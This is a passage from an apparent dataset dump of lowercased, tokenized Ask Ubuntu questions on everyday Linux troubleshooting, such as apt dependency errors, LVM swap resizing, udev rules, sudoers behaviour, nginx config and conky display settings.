//ppa.launchpad.net/fkrull/deadsnakes/ubuntu lucid main deb-src http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu lucid main ubuntu @ tm-21 : /mnt/cartodb $ cat /etc/apt/sources.list.d/* deb http : //ppa.launchpad.net/cartodb/gis/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/gis/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/mapnik/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/mapnik/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/nodejs/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/nodejs/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/postgresql/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/postgresql/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/redis/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/redis/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/varnish/ubuntu lucid main deb http : //ppa.launchpad.net/cartodb/varnish/ubuntu lucid main any suggestions , advice how to proceed ? i really do n't grok the apt system well , unfortunately . it 's a server , so i ca n't benefit from many of the gui based tips . thanks for any help ! ( i 've also posted to the cartodb mailing list ) [ 1 ] 46 sudo apt-get install -yv libmapnik-dev python-mapnik mapnik-utils 47 sudo apt-get install -f libmapnik-dev python-mapnik mapnik-utils 48 sudo apt-get clean 49 sudo apt-get install -f libmapnik-dev python-mapnik mapnik-utils 50 sudo apt-get autoclean 51 sudo apt-get install -f libmapnik-dev python-mapnik mapnik-utils 52 sudo apt-get install -f 53 sudo apt-get install -f libmapnik-dev python-mapnik mapnik-utils 54 sudo dpkg -- configure -a 55 sudo apt-get -f install 56 sudo apt-get install -f libmapnik-dev python-mapnik mapnik-utils 57 sudo apt-get -u dist-upgrade 58 sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade 59 sudo apt-get install -y libmapnik-dev python-mapnik mapnik-utils
435283	tomcat and eclipse integration error : `` unknown version of tomcat was specified . ''	i am using ubuntu 13.10 and gnome 3.10 . i have followed this tutorial set up eclipse and tomcat 7 on ubuntu 12.10 to create java restful web services with jersey to setup tomcat and eclipse . but when i reach to step 9 , i get the following error on eclipse : . i tried many solution provided on askubuntu but did n't work for me . i have checked the usr/local folder but tomcat7 is not there . so i double checked the /usr/share folder and tomcat7 is there . i used the following command to install eclipse and tomcat : sudo apt-get install eclipse tomcat7 -y
435289	permission denied - running script	i am new somewhat to scripting in ubuntu and i have the following script which i am executing but getting back permission denied messages . any help is greatly appreciated ! here 's the sequence : the script : ! /tm/local/bin/bash blockdev -- setra 16384 /dev/sd [ bcdefghijkl ] echo 1024 > /sys/block/sdb/queue/read_ahead_kb echo 1024 > /sys/block/sdc/queue/read_ahead_kb echo 1024 > /sys/block/sdd/queue/read_ahead_kb echo 1024 > /sys/block/sde/queue/read_ahead_kb echo 1024 > /sys/block/sdf/queue/read_ahead_kb echo 1024 > /sys/block/sdg/queue/read_ahead_kb echo 1024 > /sys/block/sdh/queue/read_ahead_kb echo 1024 > /sys/block/sdi/queue/read_ahead_kb echo 1024 > /sys/block/sdj/queue/read_ahead_kb echo 1024 > /sys/block/sdk/queue/read_ahead_kb echo 256 > /sys/block/sdb/queue/nr_requests echo 256 > /sys/block/sdc/queue/nr_requests echo 256 > /sys/block/sdd/queue/nr_requests echo 256 > /sys/block/sde/queue/nr_requests echo 256 > /sys/block/sdf/queue/nr_requests echo 256 > /sys/block/sdg/queue/nr_requests echo 256 > /sys/block/sdh/queue/nr_requests echo 256 > /sys/block/sdi/queue/nr_requests echo 256 > /sys/block/sdj/queue/nr_requests echo 256 > /sys/block/sdk/queue/nr_requests # set read-ahead . echo `` setting read-ahead to 64 mib for /dev/md0 '' blockdev -- setra 65536 /dev/md0 # set stripe-cache_size for raid6 . echo `` setting stripe_cache_size to 16 mib for /dev/md0 '' echo 16384 > /sys/block/md0/md/stripe_cache_size echo 8192 > /sys/block/md0/md/stripe_cache_active # disable ncq on all disks . echo `` disabling ncq on all disks ... '' echo 1 > /sys/block/sdb/device/queue_depth echo 1 > /sys/block/sdc/device/queue_depth echo 1 > /sys/block/sdd/device/queue_depth echo 1 > /sys/block/sde/device/queue_depth echo 1 > /sys/block/sdf/device/queue_depth echo 1 > /sys/block/sdg/device/queue_depth echo 1 > /sys/block/sdh/device/queue_depth echo 1 > /sys/block/sdi/device/queue_depth echo 1 > /sys/block/sdj/device/queue_depth echo 1 > /sys/block/sdk/device/queue_depth i gave everyone execution access like this : chmod a+x /home/tm/raid-sync.sh i execute it like this : root @ lserver : ~ # sh /home/tm/raid-sync.sh it returns this : /home/tm/raid-sync.sh : 1 : /home/tm/raid-sync.sh : ! /tm/local/bin/bash : not found setting read-ahead to 64 mib for /dev/md0 setting stripe_cache_size to 16 mib for /dev/md0 /home/tm/raid-sync.sh : 29 : /home/tm/raid-sync.sh : can not create /sys/block/md0/md/stripe_cache_active : permission denied disabling ncq on all disks ...
435290	how to extend logical volume swap space to atleast 64 gb on ssd	my current configuration of physical volumes is as follows . -- - physical volume -- - pv name /dev/sda5 vg name vgssd pv size 190.89 gib / not usable 1.00 mib allocatable yes ( but full ) pe size 4.00 mib total pe 48867 free pe 0 allocated pe 48867 pv uuid sajllb-kpae-zeys-k5hr-enq6-a1tp-zpzjue -- - physical volume -- - pv name /dev/sdb vg name vgssd pv size 465.76 gib / not usable 4.02 mib allocatable yes pe size 4.00 mib total pe 119234 free pe 194 allocated pe 119040 pv uuid yekbzz-gupe-6gjh-qjux-mjmi-rhyx-yevzop and below is the configuration of my logical volumes : -- - logical volume -- - lv name /dev/vgssd/home vg name vgssd lv uuid xozhk8-4dj2-xfqe-7f2j-xglb-2nvg-ro9ya3 lv write access read/write lv status available # open 1 lv size 4.66 gib current le 1192 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv name /dev/vgssd/swp vg name vgssd lv uuid cyyt1b-bqhm-vwqa-w8ou-0e8y-ovyd-894t86 lv write access read/write lv status available # open 2 lv size 1.86 gib current le 476 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv name /dev/vgssd/srv vg name vgssd lv uuid aiwcxs-ibkg-5iul-rxi1-uzjt-fyps-xphykc lv write access read/write lv status available # open 1 lv size 649.37 gib current le 166239 segments 2 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 currently , i want to extend the swap space ( /dev/vgssd/swp ) from ~2 gb to 64 gb . i think i can shrink /dev/vgssd/srv and save 64 gb for swap space . however , i am not sure which physical volumes ( /dev/sda5 or /dev/sdb ) the new swap space is allocated to when i actually extend ( /dev/vgssd/swp ) . i want to make sure the swap space is on ( ssd with pv name /dev/sda5 ) so data can be written and read in high speed . do you have any ideas how i can do that ?
435291	how to add words to a text file using just open terminal command ( no editors ) and then save the text file	i 'm new to linux . i need to edit .conf file from open terminal only and not using any text editors . that is , can i add words and sentences to a config file from open terminal ? example : command /home/ ... /file.conf -add 'abcd ' to 23rd line and so on . and finally save it . is it possible to search a specific word in that config file and add a new text to next line of that config file using only command ?
435295	2d - 3d modes query	after running the echo $ desktop_session i see that it says that 3d mode is not supported on my system . what i am wondering if this is because of a driver issue or a hardware issue ? i am running an ati 9200 radeon . i just went through the nightmare of trying to install fgrlx until my system just got so messed up i had to re-install ubuntu .
435299	root login password when i never set it ?	sorry for too many duplicate questions about this . but i do n't think any of the answers to these kind of question has the solution for me . as some users might have asked , how to set root login password when i never set it at installation ? i 'm new to ubuntu , and although i used it mainly just for browsing and writing documents , i never use it beyond the standard user wall . now i 'm going to use it to learn develop ruby . my friend helps me over email with the terminal commands sequence needed to set up ruby and rails and whatsoever needed on my ubuntu . but when i run the first command apt-get update , the os tells me that it ca n't lock something something , and finally hinted `` are you a root ? '' just fyi , this ubuntu is a clean installation on virtual machine , and i just set one account name with one password at the installation . i never get asked about a root password . i googled about how to run a command as root , and i found that i need to use the sudo command . but when i add the sudo prefix before the apt-get update command , i get asked for root password . i used my first and only account password , and it did n't work . from what i 've read on the internet , i get this conclusion and confusion : the first user you created on the installation is a default admin . -- but why i ca n't use administrator command , and have to requiring sudo ? ca n't i just make my account at the same level as root account ? you need to go into recovery mode to reset the root password . -- but the recovery mode is hard to access using virtual machine boot ( pressing shift at just the right time ) . is there any other way to change the root password ? thank you for your helps .
435300	how do i make a webview transparent ?	consider the following qml snippet : page { webview { id : webview anchors.fill : parent } } i then attempt to load some html in the webview using the following javascript : webview.loadhtml ( ' < b > test < /b > ' ) ; however , the webview has a white background : ( ignore the fact that the text is too small . ) is there a way to make the background transparent ?
435301	when i start my system , the following error is displaying .	when i start my system , the following error is displaying . `` the system is running in low graphic mode '' i insert one command '' sudo apt-get install lightdm '' after this command , login screen was appeared.. but after entering password , a blank page was appearing..
435302	does a realtek rtl8191su wlan usb driver need to be patched to allow monitor mode for reaver and aircrack-ng ?	hello ask ubuntu users . i 'm having trouble configuring my realtek rtl8191su wlan usb device to be able to use monitor mode . do i need to patch my rtl8191su wlan usb driver to allow monitor mode ? if it does need patching , what driver do i need , where do i download it from , how do i build and install it to get the above wireless device to work with reaver and aircrack-ng ? when i run sudo iwconfig wlan0 it says rtl-wifi i have read up loads about this but i 'm getting a little lost trying to configure my device correctly to be able to use it in monitor mode . although i 100 % know it is possible . i would really appreciate it someone could help learn how to do this . looking forward to any help . regards .
435311	is it possible for adobe flash to kill my gpu ?	the question is it possible that adobe flash in ubuntu 12.04 on firefox could damage my gpu ? history so ... there i was , using my beloved ubuntu 12.04 , doing some php/javascript/html development in firefox . i was testing using the jquery swfobject plugin on some dynamic content ... .and it had been wokring fine . then , testing some of the logic that removes old content and refreshes , i triggered an onclick event to do this to flash content . there were bugs in my code , causing it to try and instantiate flash in a div that already had flash content . my pc froze . rhythmbox was still playing , but everything else was frozen . i rebooted , and horror . black screen . after much messing around , i was able to get a 640x480 display on main monitor and not detect the second . reinstalled graphics drivers and so on ... but nothing would work . so i upgraded distro to 12.10 and reinstalled the nvidia 331 drivers . got one session out of it , and since then although ubuntu will boot with mouse and wallpaper , i have no unity and not even able to ctrl-alt-f1 terminal . nothing . windows is still working , but in windows i 'm now getting the ( very occasional ) message about my display adapter encountering a problem . it all seems a little too coincidental to me ... .. ? but is it possible ?
435314	switching between console and gui in ubuntu	when in gui mode , is there a cli commands that kills the gui and drops me into the console ? when in cli mode , is there a cli command that drops me into the gui ? i found startx , but this drop me into the gui without the unity interface , how do i launch anything ? i found service lightdm start which drops me into the gui with the unity interface . i found service lightdm stop which drops me into a blank black screen with no cli input capability . i found the ctl + alt + f* sends me back between console and gui , but it does not kill the gui . i want to kill the gui if i do n't want to use it anymore .
435320	how do i transfer a casper-rw file to a partition ?	i am using a 16gb live usb with persistence so i can work from several computers . this was working great for me until my persistence file on the usb flash drive got filled . as fat32 is limited to < 4gb file size , i would like to use a much larger ( ext2/ext3/ext4 ) partition for casper-rw instead of just enlarging the file . the drive has over 8gb free space . i know how to use gparted to make that partition , and where my casper-rw file is . my issue is , how do i transfer the contents of the existing casper-rw file to the new partition ? i do n't want to lose all of the settings and installed programs i 've added . i just want more space ( unlimited by fat32 ) for persistence .
435326	where can i download pfvar.h ?	i 'm trying to compile a source code and it needs this header file 'pfvar.h' from where can i get it i have ubuntu 12.04 lts thanks in advance
435328	how to install bad piggies on ubuntu 12.04 ?	i am completely new with wine . i have n't installed any games through wine . what are the steps to install bad piggies on ubuntu 12.04 ?
435334	virtualenv equivalent for all programs	virtualenv allows users to create a directory where custom python packages can be installed and called as if they were installed the normal way by sudo . is there an equivalent that can create a kind of fake root directory so that a user without sudo privileges can do things like apt-get and make install ?
435335	updated from ubuntu 12.04 lts wubi to 13.10 , wo n't boot now	yesterday night , i have installed ubuntu 12.04 lts through wubi , since i do n't want it to be on a cd or a usb . later that night , i have updated the version from 12.04 lts to 13.10 . it asked me to reboot to complete the installation of the update , so i did that . afterwards , like normal booting , it asked me which os do i want to open . windows 7 or ubuntu , so i chose ubuntu , of course , but , after i clicked on the ubuntu button , the ubuntu start up screen shows ( the ubuntu logo which has five grey loading dots under it ) and then it disappears and turns into a black screen with a white line . the white line is n't even moving . what 's going on ? please help .
435341	how to stop and restart firestarter events / logging	i need a simple workaround to be able to stop and maybe restart only when needed logging events in firestarter . i managed to enable logging in ubuntu for firestarter using this solution , and all is ok now but i have no idea how to disable events and at the same time to allow firestarter to do its job quietly . i use open dns servers , and sometimes i get cpu overload because firewall events are coming one after the other with great speed building up a huge list in the events section . even if i delete all events , the problem is not solved so i have to quit firestarter interface , and restart it after 1 minute or so to give my cpu some fresh air . i like chinese , i think they are a great people but most of the so-called 'serious threats ' logged in firestarter event section are coming from china , and i noticed that my cpu starts overloading especially after getting 2 or more of this serious threats . i do n't use ufw firewall because i do n't know how to properly configure it to make it work for real , and it does n't seem to do a great job anyway . oh , i forgot to mention that after installing 'denyhosts ' package , firestarter seems to be working better , but still i do get cpu overload from time to time .
435345	why has ubuntu one music store not renewed its security certificate ?	i have been trying to download music from the music store but firefox tells me the security certificate expired two days ago so it wo n't let me . is this something they might not realise , i.e. , do they need telling ?
435348	usb udev rule never worked for me	i try to have a usb device recognized as being part of my user group . so i do n't have to issue a sudo during development time when i debug my program which access those devices . especially painful when using netbean or eclipse . the udev rules never worked : $ cat /etc/udev/rules.d/40-usbio.rules subsystem==”usb” , env { devtype } ==”usb_device” , mode=”0664” , group=”odroid” , attr { idvendor } ==”04d8” , attr { idproduct } ==”003f” i also tried with mod mode=”0666” and mode=”0777” . the weirdest part is that my usb camera has the same privileges and is part of the same group ( root ) . but it never requires a sudo when i use cheese nor camorama . ls -l /dev/bus/usb/001/013 -- -- -- -- -- -- -- - > camera crw-rw-r -- 1 root root 189 , 12 mar 16 21:25 /dev/bus/usb/001/013 ls -l /dev/bus/usb/002/007 -- -- -- -- -- -- -- -- > usb device crw-rw-r -- 1 root root 189 , 134 mar 16 21:32 /dev/bus/usb/002/007 i also want to do the same with an arduino , but even with the proper rule file , it just does not work . even after restarting udev or the computer . how to fix this ?
435349	find matched strings in two files	i have two files like this : file_a : 1 a 2 b 3 c file_b : 1 d 2 b 3 c so what i want to do is find the matched rows based on column 2 and get a new file . both of the files have a header line
435351	how can i get `` delta '' packages to optimize apt-get upgrade downloads ?	i have recently installed fedora in virtualbox and noticed that they use delta-rpm packages , which help dramatically reduce downloading sizes . also i heard that gentoo uses some delta packages . would be glad to see such deltas in ubuntu too . does anyone know about such delta-deb packages and how do i get to use them ?
435358	ssh session hanging the remote desktop	i have been remotely connecting to my ubuntu dekstop at work using ssh , i have noticed that after some ideal time the connection hangs and on restarting the ssh , ssh does not identify my desktop on the remote side . later i observed that the remote desktop usually hangs up when my ssh connection hangs up ? could anyone help with this ? i usually forward ports in ssh as there is an intermediate server .
435362	how do i install gedit-2	i want to install gedit 2.0 on my ubuntu 12.10 . the purpose is testing a plugin that seems not to have support for 3.0 or above . my current version is : vlad @ computer : ~ $ gedit -- version gedit - version 3.6.1 i tried so far looking for an older package on the internet but i did n't find anything . any suggestions on how to install it would be highly appreciated . thanks in advance !
435367	ubuntu 12.04 graphics related problem	i have dell inspiron n-3521 model laptop with dual boot ( windows 7 and ubuntu 12.04 ) . when i open my work with windows it performs normally , but when i open with ubuntu 12.04 my laptop heats up quickly .
435368	diskless boot with ipv6	at our work we are using around 80 diskless machines running ubuntu . we want to make the transition to ipv6 , so now i 'm trying to get our diskless system to work with ipv6 . the transmission of the kernel and initramfs can be still over a ipv4 connection , but once the machine is fully booted i want all network connections to be over ipv6 . this means that the nfsroot has to be mounted via ipv6 . my research of this has shown that initramfs-tools ( 1.18.5-1ubuntu4.1 ) does not support ipv6 . that means that neither ipconfig , that 's used for interface configuration at early boot time , nor the mount mounting procedure for the nfs root are ipv6 capable . to circumvent this i added two binaries to the initramfs ( /etc/initramfs-tools/hooks/ipv6 ) : # ! /bin/bash . /usr/share/initramfs-tools/hook-functions copy_exec /sbin/dhclient /sbin copy_exec /sbin/mount.nfs4 /sbin i use these to ( a ) request a dhcpv6 at early boot time with /sbin/dhclient -6 -1 -cf /tmp/dhclient.conf -pf /tmp/dhclient6.eth0.pid -lf /tmp/dhclient6.eth0.leases eth0 and ( b ) to configure the interface with the address i attained by executing ipv6= $ ( cat /tmp/dhclient6.eth0.leases | grep iaaddr | egrep -o `` ( [ a-f0-9 ] { 1,4 } : ) { 3 } ( [ a-f0-9 ] { 0,4 } : ) { 0,4 } [ a-f0-9 ] { 1,4 } '' ) ip -6 addr add $ ipv6/112 dev eth0 usually the nfs root is mounted with the following command in /usr/share/initramfs-tools/scripts/nfs : nfsmount -o nolock $ { roflag } $ { nfsopts } $ { nfsroot } $ { rootmnt } but this does n't seem to accept ipv6 addresses . so i changed it to : mount $ { roflag } -t nfs4 $ { nfsroot } $ { rootmnt } $ nfsroot in this case is [ 2001:4ca0:2218:1 : :1:2 ] : /lb/diskless/rootfs/ubuntu_1204_ipv6 . the interface configuration seems to work as well as the root mounting , but when /sbin/init is executed ( i think ) , the ipv6 is dropped again , and therefore the system freezes ( because it can not access the ubuntu root anymore ) . the /etc/network/interfaces looks like this : auto lo iface lo inet loopback iface eth0 inet manual iface eth0 inet6 manual is there a way to keep the interface configuration from the initramfs ? or am i doing something wrong when i configure the interface with ip ?
435374	cant work out how to do `` chkconfig systat on '' & `` service systat start '' on ubuntu 12.04	can anyone tell me how to do this in ubutu from command line ? we have no gui . chkconfig sysstat on service sysstat start i tried installing chkconfig , and get the error : '' package chkconfig is not available , but is referred to by another package ... e : package 'chkconfig ' has no installation candidate '' i saw someone said you have to use `` sysv-rc-conf '' , but this command : apt-get install sysv-rc-conf gives exactly the same install error as chkconfig . someone else suggested using upstart , but this looks very complex and i could not work out how to use it on to do the above 2 commands . i also saw someone recommending `` update-rc.d '' . i have looked at this page : http : //manpages.ubuntu.com/manpages/hardy/man8/update-rc.d.8.html but unfortunately am still clueless how this tool can be used to do the simple automatic starting of a service . in the old days we would simple edit rc2.d scripts , is this still possible ?
435377	extended partition	i am not allowed to have more than 4 partitions.during installing ubuntu i am not allowed to have swap area because of this problem.what should i do ?
435380	how do i load ubuntu 13.10 ?	i 'm a novice when it comes to ubuntu ! ! tried linux red hat about a decade ago but could n't get my head around the mounting and unmounting process . stuck with what i knew and that was windows . got my hands on ubuntu 10.12 i think and love it ! now i want to load 13.10 . so i downloaded from the site and burned the iso to a dvd . i also tried the usb way but to no avail ! ! when trying the disk it keeps on giving me a `` no default or ui configuration directive found '' error . nothing happens when i try the usb . i done all the changes in the bios to detect the usb and cd-rom as first boot devices and even removed the hdd as a boot device . still no joy ! it also comes up with a command line boot : but im not sure what to type in ? ? any related answers will be much appreciated .
435382	install module bz2 on python	i 'm trying to install the module bz2 on python v2.7 . i 'm using ubuntu 12.04 lts and i have already installed libbz2-dev through synaptic . i read that i need to rebuild python to take the changes of libbz2-dev ( file headers ) . but i know that the process is dangerous on ubuntu since the os uses python . do you have a process to install bz2 or to recompile python safely ? best jg
435388	disable `` semi-maximize left '' in ubuntu 13.10	as the title says , how can i disable or re-assign the `` semi-maximize left '' keyboard shortcut in ubuntu 13.10 ? by default it is bound to ctrl + super + â i have tried to change the bindings for the `` put left '' action with compizconfig-settings-manager as suggested by the previous question for ubuntu 12.04 . this however no longer works in ubuntu 13.10 . this question is motivated by the keyboard shortcut conflicts between the default unity desktop and intellij idea .
435390	sharing file between 2 ubuntu machines	sorry for asking what is most probably an already answered question . i have 2 machines running 12.04 ( desktop and a laptop ) and i want to move nearly 50gig of files from one to the other in the most efficient way possible . i have taken all the files i need from my laptop and saved them all inside one file on my desktop , ready to be moved over to my pc . i then plan to move them from my pc , to my external hd ( that can only be connected to my desktop pc ) there are a few different ways for me to do this , and i have spent the last couple of hours trying to figure out which would be the best way , but have only succeeded in confusing my little n00b brain more . i need a guide with basic step by step instructions , including every step that i will need , but also in a format that is easy to understand and implement please . im sure this has been answered before , but either i cant find the thread , or my brain is throwing spanners in the works , so your help would be greatly appreciated . thanks ubuntu masters edit i have just tried using 'giver ' and it seems to work for small pictures but not for larger things or folders . i used this guide succesfully ; how to transfer files between ubuntu machines ? but i assume the programme isnt capable of moving 45gig folders at one time , but it should help someone wanting to move smaller files easily .
435391	uninstalling a compiled package	i have installed gambas2_2.23.1.orig.tar.gz from https : //launchpad.net/ubuntu/+source/gambas2/2.23.1-1ubuntu3 in ubuntu 13.10 , by configuring and then making it . how can i uninstall it and reverse all changes it has done ?
435392	gave up waiting for root device 13.10	i have just tried to install ubuntu 13.10 alongside windows 8.1 and after having a bit of difficulty with it have tried to install just ubuntu . it installed fine , and i immediately updated . when i restart i am able to get to the grub menue , and after selecting ubuntu the screen turns blank purple . after a long while the screen turns black and then comes up with a '' gave up waiting for root device screen '' followed by a busybox shell . i am still able to access ubuntu through the ubuntu recovery boot but have so far found no way to solve my problem . i have tried to edit the boot commands to have root=/dev/sda1 , which is my /boot/efi mount point according to gparted , but this has not fixed anything . if you need more information please ask .
435393	why do n't the commands 'sudo bash ' or 'sudo -s ' ask for a password ?	even when i am logged in as a non-admin user , when i enter sudo bash or sudo -s , the system does not ask for any password . in the command history , i have not entered any password for sudo earlier ( i.e. , sudo did not cache any user credentials which might cause it to not ask for my password again in this session . ) why is this strange behavior ? and how do i make sure that every sudo and su command requires a corresponding password ? and how to strictly ensure that any user can not get root privileges without entering the root password ? here is the content of my /etc/sudoers file : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d all all= ( all ) nopasswd : all
435396	how can the installation of kvm /virt-manager cause standby-resume failures ?	question : i installed kvm and virt-manager , because i wanted to try it as replacement for virtualbox . now ever since i installed kvm/virt-manager , my laptop does not return from standby , it just crashes . what can cause this ? there was no vm running at the time , it happens regularly ... i do n't find it funny , i have to switch off the laptop every time , and sooner or later this will result in data loss .
435403	how to start building games on ubuntu	i , like many people , always wanted to make my own # bada55 game . but , making a game is as time consuming as can be . but , still , its something i want to start doing when time is available . preferably on ubuntu . how does ubuntu hold as a game creation platform ? what are the native tools available ? what does ubuntu offer , for the creation of games .
435404	advantages of using mac version of ubuntu	i was trying to use the mac alternate iso to install ubuntu and it was n't working out . i 'm pretty sure i could fix , but i wan na know if it is worth it . what advantages does it offer for mbp 2010 15 inch .
435408	canon pixma mx 375	i am new in ubuntu , and i am loving it , still i understand that i am a noob , and have much to read , and learn . still eventhough the feeling of being useless , i want to learn and use ubuntu has my os . but i have a problem , i use the computer has my office computer , and even though i managed to install the printer and print really easy , i have a few problems . the printer is multifunction , and easy scan , can not use the scan , it says it is impossible to connect to the scanner . how do i solve this ? the other question , is i would like to use fast draft to save ink , how do i do that ? please remember i am a noob , so please explain to me like to a child
435409	pcb software available for gnome	i 'm looking for pcb software in ubuntu . ideally i want to design a circuit without needing it to be really specific . i can not seem to find any software available . any suggestions ?
435412	boot , reboot from win 8.1 error	i have win 8.1 and ubuntu 13.10 installed , both are working fine but.. when coming from win-8 and rebooting the pc i will get an `` error : no boot disk has been detected or the disk has failed '' . i then have to go in to bios and change the start sequence to `` ubuntu '' and it will stay that way until next time i use win-8 . if i reboot from ubuntu it works just fine , i end up in the grub and can choose whatever i want to do . very annoying and probably ( hopefully ) easy to solve , but i ca n't see how .
435416	missing top bar in ubuntu 12.04	im running ubuntu 12.04 , after a fresh os install , i installed gnome-panel aka gnome-fallback and i 've been using it ( gnome classic no effects ) without any problem ... ... until 2 days ago . i was messing with the panels , clicked on `` remove panel '' and the whole bar was gone . i tried a lot of things like : rm -rf .gnome .gnome2 .gconf .gconfd .metacity rm -rf .gconf/apps/panel gconftool -- recursive-unset /apps/panel & & killall gnome-pane uninstalled/installed gnome-panel unity -- restart ( even knowing that this has nothing to do with gnome-panel ) rebooted computer but none of this works . i cant get back my top bar . to do some more testings , i created a new user and the top bar perfectly works with that new user , which means that the problem should be in some config file that applies only to my current user . any idea of where is the problem ? thank you in advance !
435417	how can i change the behaviour of lubuntu when wifi connection is lost ?	does anyone know how i can change what lubuntu ( 12.04 ) does when it loses the wifi signal ? right now it tries to reconnect - but after a few unseccessful tries it stops trying and asks for the admin password and/or the wifi-password . i want it to keep trying indefinitely without prompting any error messages etc . thanks guys !
435418	xdebug not worked with lampp , am i working with wrong php.ini ?	i have installed xampp on ubuntu 12.04 32bit below are my phpinfo details for php.ini configuration file ( php.ini ) path /opt/lampp/etc loaded configuration file : /opt/lampp/etc/php.ini now i tried to install xdebug to lampp , downloaded xdebug-2.2.4.gz , done with all the steps from xdebug instruction page added below lines in /opt/lampp/etc/php.ini zend_extension = /opt/lampp/lib/php/extensions/no-debug-non-zts-20121212/xdebug.so restart apache sudo /opt/lampp/lampp restart but still xdebug is not installed , doesnt show any details in phpinfo even if i write any changes using invalid syntax in php.ini , it does not throw any error when we restart the lampp , so am i doing necessary changes in right php.ini or it is located somewhere else ?
435420	install native texlive in parallel to repo version	i 'm still running ubuntu 12.04 and i would like to manually install the most recent texlive . one of the first steps for the manual installation is to get rid of existing installations of texlive . however , i want to keep my default texlive installation from the ubuntu repositories , since i have a huge number of latex documents , which sometimes may rely on version-specific modifications . therefore my question is how to use a native texlive installation ( or possible multiple ) in parallel to the installation from the ubuntu repositories ? what steps in the manual installation change in order to account for an existing installation ? and how do i tell my system which texlive distribution i want to use ? i think answering this question will probably answer all my related questions as well , like for instance : is the current distribution only determined by the executables which are currently in the path ? and if so , how can i quickly switch between the distributions ? it looks like the texlive binaries in /usr/bin are not symlinks but real binaries , so i 'm not sure how i can hide their existence without deleting them . and what may also be challenging : how can i find out all binaries that belong to a texlive distribution ( pdftex , pdflatex , luatex , xetex , ... ) ? will changing the distribution automatically affect build systems/editors ( like rubber/latexmk/eclipse/gedit ) as well , or is it necessary to make manual changes each time ?
435421	ubuntu ca n't see my windows 7 ! and the disk drive is unallocated ?	i have a fujitsu laptop and i ca n't install ubuntu because ubuntu can not find the partitions of my disk drive ! it said `` unallocated '' of my disk drive `` 500 gb '' , and no partition appears . but i actually have `` 4 '' partition and windows 7 and windows xp . ubuntu actually finds the partitions in `` home folder '' when exploring my disk and asked to `` mount '' when the first time i wanted to open the partition . as i said before , it does not appear in installer and in gpart , so what to do ?
435422	how to get unity dash source code and compile it	hey guys i am trying to create a desktop environment using compiz as windows manager and docky and i want unity dash as the default app launcher so i want to know how to get unity dash source and compile it .
435426	is this cpu usage for teamviewer on ubuntu normal ? if so , are there any better options ?	this image was taken while logged in remotely via teamviewer to my workstation . there are four teamviewer_desktop processes open ( why ? ) , two of them taking a large amount of cpu ( why ? ) . i tried connecting to a windows system , and while the memory usage is about the same ( a couple of hundred mb ) that only uses about 1 % cpu on the windows system , indicating teamviewer runs much better on windows . i am suspecting that teamviewer for linux is just a poorly implemented wine bundle and that this might be expected , but i just wanted to confirm -- is this how you see teamviewer performing as well ? and if so , are there any better options that you can link guides to that accomplish the same firewall-agnostic remote desktop solution for both windows and linux ?
435431	error writing /etc/nginx/nginx.conf : no such file or directory	i just installed nginx in ubuntu 12.04 then i want to configure it but i 'm having a problem saving it . when i hit save , it says : error writing /etc/nginx/nginx.conf : no such file or directory . how can i resolve this problem ?
435432	are there alternatives to unetbootin ?	is there any software like unetbootin in ubuntu ? i cant install or run unetbootin-494 even though i already set it to allow executing files as programs .
435434	problem with adding a dll file to wine 1.6 in ubuntu 13.10	i tried to use freegate in ubuntu 13.10 but when i try to open it , it gives an error about missing a dll file . so i must add this dll to wine , but how to do that ? i searched the net but i could n't do that .
435435	conky black background on unity	i 'm using ubuntu 13.10 ( and 14.04 on another computer ) with unity . conky does n't work like i expect . this is my config : alignment top_right background yes border_inner_margin 0 border_width 0 top_cpu_separate yes default_color ffffff default_outline_color 000000 # default_shade_color 999999 double_buffer yes draw_borders no draw_graph_borders yes draw_outline yes draw_shades no gap_x 0 gap_y 30 maximum_width 222 minimum_size 222 own_window yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager own_window_transparent yes own_window_argb_visual yes own_window_argb_value 0 own_window_type override own_window_class conky-semi show_graph_scale yes total_run_times 0 update_interval 5 text_buffer_size 1024 use_xft yes xftfont ubuntu : size=8 in this config conky have black background , not disappear when showing or clicking desktop . if i change own_window_type to 'desktop ' conky runs with transparency but if i click on desktop it disappear ( but still working ) . if i change own_window_type to 'normal ' it have transparency and does n't disappear on clicking on desktop but it minimize when i click on show desktop button and does n't recover ( still running ) .
435438	how to install windows after installing ubuntu on the whole drive	i have installed ubuntu 13.10 on the whole hard disk and now want to install windows 8 to get a dual boot . at the end , i want to have 3 primary partitions , one of 70 gb in which ubuntu is installed , another of 60 gb in which windows 8 is installed and the third one in which my data is kept ( it contains the rest of hard disk ) . here is the screenshot of the gparted : http : //imgur.com/4e6z8bm
435440	help on installation	my ubuntu installation crashed today . when i began this installation , i was warned about creating a swap space for physical memory or it will crash if the system does n't have enough memory . i did proceed with the installation without creating the swap space or paging file because i did n't know how to do it . any type of help would be greatly appreciated .
435441	ubuntu 13.10 cpu1 usage over 75 % and other core 20 %	ok i 'm on ubuntu 13.10 64bit and while doing nothing i can see from system monitor that cpu1 has a 75 % + of load meanwhile the other core stayat 20 % ... sometimes they go up but not for too long ... what should i do ? is this normal ? cpu : i5-4200m . doing top on terminale i see under command column `` kworker/0:0 '' with 77 % cpu ... what is ? it s the cause of all this..
